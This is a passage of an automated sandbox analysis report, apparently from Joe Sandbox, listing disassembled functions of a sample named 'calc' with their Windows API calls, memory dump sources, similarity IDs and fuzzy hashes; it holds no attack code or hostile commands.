    Function 00414563 Relevance: 9.0, APIs: 6, Instructions: 41windowtimethreadCOMMON
    Download Yara Rule
    APIs
    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00414572
    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0041458A
    • GetWindowThreadProcessId.USER32(?,?), ref: 0041459C
    • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 004145AB
    • TerminateProcess.KERNEL32(00000000,00000000), ref: 004145B5
    • CloseHandle.KERNEL32(00000000), ref: 004145BC
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
    • String ID:
    • API String ID: 839392675-0
    • Opcode ID: 00d819eeed1d390f532930fa1349814da3c729ed7603d7904b804da2bb56bfe2
    • Instruction ID: ed9ddd3d8bd6e0158ad2fd664c2ba70d314683d2c30b968afa84626bca73c302
    • Opcode Fuzzy Hash: 00d819eeed1d390f532930fa1349814da3c729ed7603d7904b804da2bb56bfe2
    • Instruction Fuzzy Hash: 32F0F97214122DFBEB215B62DC0DEEF3E6CEF457A2F004124FA0595062E7719E52DAA4
    Function 0040EF2E Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 222libraryloaderCOMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: AddressProc$_strcat_strlen
    • String ID: AU3_FreeVar
    • API String ID: 3781172953-771828931
    • Opcode ID: 8281b0565c634555f88174ff591135a762572cfac3b1c1d737b3c45fd0b1fdab
    • Instruction ID: c71524f2f339666a60e8fdc2e6ee78f872a6af596eaf6628cc854a2bbacd3a1d
    • Opcode Fuzzy Hash: 8281b0565c634555f88174ff591135a762572cfac3b1c1d737b3c45fd0b1fdab
    • Instruction Fuzzy Hash: 3371C231900206EFDB20AF66C8419AE77A1FF04314F15457FF805BB692CB78AD51DB99
    Function 0042B114 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0042FE9D: LoadLibraryA.KERNEL32(Wininet.dll,0042A74E), ref: 0042FEA8
      • Part of subcall function 0042FE9D: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 0042FEBA
    • FreeLibrary.KERNEL32(00000000,?,00000003), ref: 0042B198
    • FreeLibrary.KERNEL32(?,?,00000003), ref: 0042B2A5
    • FreeLibrary.KERNEL32(?,?,00000003), ref: 0042B2AF
    • FreeLibrary.KERNEL32(00000000,?,00000003), ref: 0042B2B9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Library$Free$AddressLoadProc
    • String ID: <local>
    • API String ID: 1386263645-4266983199
    • Opcode ID: 32da04e832618fddd7a87dad8587297ad2d2ab068d8d49f6a0b5dfce77d14965
    • Instruction ID: 88fc05d2817ab47fd5b179a8d744bb7f0cbe5fd8e9c3f9efe6eed6e79e075052
    • Opcode Fuzzy Hash: 32da04e832618fddd7a87dad8587297ad2d2ab068d8d49f6a0b5dfce77d14965
    • Instruction Fuzzy Hash: 9F517D31A00239EBDF25DBA4EC89EEEB778FF09740F904566E414A2250C7346A54CBE9
    Function 0040BBDB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120windowCOMMON
    Download Yara Rule
    APIs
    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0040BC75
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0040BC8B
    • SendMessageW.USER32(?,00001057,00000000,?), ref: 0040BCE9
    • SendMessageW.USER32(?,00001061,00000000,0000000F), ref: 0040BD1B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend$Window
    • String ID: SysListView32
    • API String ID: 2326795674-78025650
    • Opcode ID: 3b481caf0953346a7e8077040f5393369a323a79dfd9c11cb0caeb0d9e865e50
    • Instruction ID: ec6a700272040e40e92a54c56fa040193a127b838e178095dd06ae8a84f88c0f
    • Opcode Fuzzy Hash: 3b481caf0953346a7e8077040f5393369a323a79dfd9c11cb0caeb0d9e865e50
    • Instruction Fuzzy Hash: 86415871800209EBDF219F68C845ADE7BB9EB19358F01016BF948B6292C779D944CF98
    Function 00402148 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92windowCOMMON
    Download Yara Rule
    APIs
    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004021EC
    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004021FD
    • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 0040221C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend
    • String ID: ComboBox$ListBox
    • API String ID: 3850602802-1403004172
    • Opcode ID: e56d6142577f0aa21785687b6997242bafd87418b52a07ea9a7358fffa3c1ea2
    • Instruction ID: d60bcdc587e95717233e0f7665ce71fa6e7cb240bbe0e6ca57382d096394546a
    • Opcode Fuzzy Hash: e56d6142577f0aa21785687b6997242bafd87418b52a07ea9a7358fffa3c1ea2
    • Instruction Fuzzy Hash: A931E531940214BADF216BA5DC4ABDE7FB49F05324F1041EBF5007B1E2C7B9498A9B48
    Function 0040B89C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92windowCOMMON
    Download Yara Rule
    APIs
    • GetMenuItemInfoW.USER32(?,?,00000000,0000002C), ref: 0040B938
    • IsMenu.USER32(?), ref: 0040B94B
    • InsertMenuItemW.USER32(?,?,00000001,0000002C), ref: 0040B993
    • DrawMenuBar.USER32(?), ref: 0040B9A3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Menu$Item$DrawInfoInsert
    • String ID: ,
    • API String ID: 3076010158-3772416878
    • Opcode ID: 39640288cca488a7b30a7f5d3a4a61f8e094b4a337d8e2623057536b5fde24b8
    • Instruction ID: 157fbe030ffd1d9a8f4ddc3f90bad3240d8ce1212160fce4c0ed0f8fe47e7c62
    • Opcode Fuzzy Hash: 39640288cca488a7b30a7f5d3a4a61f8e094b4a337d8e2623057536b5fde24b8
    • Instruction Fuzzy Hash: 173148B1900208EFDB10CF64D984ADABBB5FF85304F14806AEA51AB3A1D738DD45DF98
    Function 0040B37A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77windowlibraryCOMMON
    Download Yara Rule
    APIs
    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0040B3EC
    • LoadLibraryW.KERNEL32(?,?,?,004095E6,?,?,?,?,?,?,?,?,00000000,?,00000001,?), ref: 0040B3F5
    • SendMessageW.USER32(?,00000467,00000000,?), ref: 0040B409
    • 73A25CF0.USER32(?,?,?,004095E6,?,?,?,?,?,?,?,?,00000000,?,00000001,?), ref: 0040B411
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend$LibraryLoad
    • String ID: SysAnimate32
    • API String ID: 3205928328-1011021900
    • Opcode ID: 60bcf4f9e98a4ab7d6c914802edf5d53d6059652804dfc9f252d41936e200753
    • Instruction ID: a7c430d5558a324c019549c7c535725aa8373f33fb7607741f0f21616e2b7dae
    • Opcode Fuzzy Hash: 60bcf4f9e98a4ab7d6c914802edf5d53d6059652804dfc9f252d41936e200753
    • Instruction Fuzzy Hash: 7E217F71500218AFDF118F55DC84DAB7BA9EF89368F104626FD14A62E2D339CC51DBA8
    Function 0044AEC1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • __lock.LIBCMT ref: 0044AECF
      • Part of subcall function 0044C6DB: RtlEnterCriticalSection.KERNEL32(?,?,?,00449CAB,00000004,0045B078,0000000C,0044C5F4,00000000,?,0044C583,?,0045B1B8,00000060), ref: 0044C703
    • GetCurrentProcess.KERNEL32(?,0045B120,00000008,0044AFA2,?,00000001,00000000,00454705,00000003), ref: 0044AEE8
    • TerminateProcess.KERNEL32(00000000), ref: 0044AEEF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Process$CriticalCurrentEnterSectionTerminate__lock
    • String ID: HPF$TPF
    • API String ID: 3423101658-1347700362
    • Opcode ID: bd5d0b36377827fdc281da4a441c37edc5dd6684d5b5827beb6e7c1b2bc7f3a4
    • Instruction ID: 94eac9cb3b00db43925a1aac6e74254190fb75927c93439ef9a830854e02c62f
    • Opcode Fuzzy Hash: bd5d0b36377827fdc281da4a441c37edc5dd6684d5b5827beb6e7c1b2bc7f3a4
    • Instruction Fuzzy Hash: 4211E971881610EFEB11AF65DC0514E7B65EB40715B20852BF4504A1A2EF7C88A68B5F
    Function 00409CDF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46windowCOMMON
    Download Yara Rule
    APIs
    • CreateWindowExW.USER32(?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00409D15
    • GetStockObject.GDI32(00000011), ref: 00409D2B
    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00409D35
    • ShowWindow.USER32(00000000,00000000,?,0040AA2A,?,Combobox,00000000,00000000,?,?,?,?,00000000,00000000,00000001,?), ref: 00409D4D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Window$CreateMessageObjectSendShowStock
    • String ID: P
    • API String ID: 1358664141-3110715001
    • Opcode ID: 80a01e5952e50f59478d35168b5b5eb0f65f36e5d1155f84b8e4c2303647d9f8
    • Instruction ID: 7eed761070e5c0e1afa5280e21cb20fe8a54fd27ed28cfac5585aa4bc5c1357b
    • Opcode Fuzzy Hash: 80a01e5952e50f59478d35168b5b5eb0f65f36e5d1155f84b8e4c2303647d9f8
    • Instruction Fuzzy Hash: 99015773104289BFDF124FA09C88EEA3F6AAF88355F058129FB54511A2C3368CA5EB15
    Function 00451219 Relevance: 7.7, APIs: 5, Instructions: 189COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: __set_statfp
    • String ID:
    • API String ID: 441778723-0
    • Opcode ID: 52ae6cc645bf3ce7b1888e412e0c71e2239a1c70beff03525a624c2e7823df0f
    • Instruction ID: aafa024366cfe14e36a4ce7ed12ccb1bd2abc6eada7316b3c0f4e51b7e6ebd75
    • Opcode Fuzzy Hash: 52ae6cc645bf3ce7b1888e412e0c71e2239a1c70beff03525a624c2e7823df0f
    • Instruction Fuzzy Hash: EB513731800E19D3EB144B94D8587AE7B70FF4135AF1946AADCE0A62F6CB78486DC34D
    Function 00454A84 Relevance: 7.7, APIs: 5, Instructions: 184COMMON
    Download Yara Rule
    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,0044D815,?), ref: 00454B37
    • InterlockedExchange.KERNEL32(00467970,00000001), ref: 00454BB5
    • InterlockedExchange.KERNEL32(00467970,00000000), ref: 00454C1A
    • InterlockedExchange.KERNEL32(00467970,00000001), ref: 00454C3E
    • InterlockedExchange.KERNEL32(00467970,00000000), ref: 00454C9E
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ExchangeInterlocked$QueryVirtual
    • String ID:
    • API String ID: 2947987494-0
    • Opcode ID: d3930fd77430739b71b2632bfe3ca3d3c1fc5acb29cc6cdf36d9155b892b8d0a
    • Instruction ID: c5d8ed88eee3e8925b2251e902281fd8498e535b2407cacacb70f59125c8bbb1
    • Opcode Fuzzy Hash: d3930fd77430739b71b2632bfe3ca3d3c1fc5acb29cc6cdf36d9155b892b8d0a
    • Instruction Fuzzy Hash: F0510A306556108FDB2A8F19C88476A73E1ABC571EF25412BDD528F293E378DCC9864D
    Function 0044DA7D Relevance: 7.7, APIs: 5, Instructions: 166COMMON
    Download Yara Rule
    APIs
    • WideCharToMultiByte.KERNEL32(?,00000000,0047E800,?,?,?,00000000,0047E800,?,00000010,00000000,?,00428642,?,0047E800,?), ref: 0044DB29
    • WideCharToMultiByte.KERNEL32(?,00000000,0047E800,000000FF,?,?,00000000,0047E800,?,00000010,00000000,?,00428642,?,0047E800,?), ref: 0044DB51
    • GetLastError.KERNEL32(?,00428642,?,0047E800,?), ref: 0044DB6C
    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,0047E800,?,00428642,?,0047E800,?), ref: 0044DBAC
    • WideCharToMultiByte.KERNEL32(?,00000000,0047E800,000000FF,00000000,00000000,00000000,0047E800,?,00000010,00000000,?,00428642,?,0047E800,?), ref: 0044DC0A
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ByteCharMultiWide$ErrorLast
    • String ID:
    • API String ID: 1717984340-0
    • Opcode ID: dcbc1b91eae5fde9e6d3553c56a64b382ae7bd69820422cff85a185492ed28cd
    • Instruction ID: f0777e9540ddcf14f99e18fd38f2961c8e9e3acc4c0c3b114796979fdd6f36af
    • Opcode Fuzzy Hash: dcbc1b91eae5fde9e6d3553c56a64b382ae7bd69820422cff85a185492ed28cd
    • Instruction Fuzzy Hash: 5F5189B1D0028AAFAF209F94CD848BFB7BAEB45314B26453FE51196250D734AD44CB69
    Function 0043C3F2 Relevance: 7.7, APIs: 5, Instructions: 151registryCOMMON
    Download Yara Rule
    APIs
    • RegConnectRegistryW.ADVAPI32(?,00000000,00000000), ref: 0043C499
    • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,?,00000000), ref: 0043C4DE
    • RegEnumKeyExW.ADVAPI32(00000001,-00000001,?,000000FF,00000000,00000000,00000000,?), ref: 0043C532
    • RegCloseKey.ADVAPI32(00000001,?), ref: 0043C56B
      • Part of subcall function 0041FE6D: GetLastError.KERNEL32(00000000,0047C7A0,00000FFF,00000000,00430AD3), ref: 0041FE82
      • Part of subcall function 0041FE6D: FormatMessageW.KERNEL32(00001000,00000000,0047C7A0,00000000,0047C7A0,00000FFF,00000000,00430AD3), ref: 0041FE96
    • RegCloseKey.ADVAPI32(00000000), ref: 0043C579
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Close$ConnectEnumErrorFormatLastMessageOpenRegistry
    • String ID:
    • API String ID: 2844598385-0
    • Opcode ID: a6aa3d789704c8e504772b46b70dd9de6c6fe34607cc2661cdd97bc8c7c76f64
    • Instruction ID: ca18b23deec50a713599ee99bd298669572856c6e0ae2ddf99e87897c19de7b6
    • Opcode Fuzzy Hash: a6aa3d789704c8e504772b46b70dd9de6c6fe34607cc2661cdd97bc8c7c76f64
    • Instruction Fuzzy Hash: F1514D72800118FBCF10EFA1D8869EE7779EF18324F14455AF505A7152DB38EE85DBA8
    Function 0044D560 Relevance: 7.7, APIs: 5, Instructions: 151COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 31539bc4c877632f358c0b568af1430693b34e37d28fc62904f138b7792e7e64
    • Instruction ID: 3f26043b1fee1b9c9fc7dfd08f39e7adaabf58cb7090512c6284b74f89030849
    • Opcode Fuzzy Hash: 31539bc4c877632f358c0b568af1430693b34e37d28fc62904f138b7792e7e64
    • Instruction Fuzzy Hash: 99410571D00225ABFF307FA69C848AF7A64EB05318711463FF819A6292DB3D4D00CB9D
    Function 00426415 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
    Download Yara Rule
    APIs
    • GetPrivateProfileSectionW.KERNEL32(00000000,?,00007FFF,?), ref: 004264A4
    • GetPrivateProfileSectionW.KERNEL32(00000000,?,00000003,?), ref: 004264D2
    • WritePrivateProfileSectionW.KERNEL32(00000000,?,?), ref: 00426512
    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00426540
    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0042654C
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: PrivateProfile$SectionWrite$String
    • String ID:
    • API String ID: 2832842796-0
    • Opcode ID: 38ada2b5a0372dd2d02d94a7d6e606ad005d217e2560cf466071832a482aba52
    • Instruction ID: 090de75c44e30297ca10da119c2b442c0f809bd188c017535f1850e90268234a
    • Opcode Fuzzy Hash: 38ada2b5a0372dd2d02d94a7d6e606ad005d217e2560cf466071832a482aba52
    • Instruction Fuzzy Hash: 58418335A0022AEBDB10EB56DC44E9AB7B8FF04324F45819BE544A7641CB38FD85CF98
    Function 0040820D Relevance: 7.6, APIs: 5, Instructions: 115COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d1d14ae53aa78bae1af3b6ab8c3683c0764a42523812b5c117524c5cd894f932
    • Instruction ID: 5d290a4b669286715e49e357ac65f606a33401fc1a9cc7abb0a2003eaea3d8df
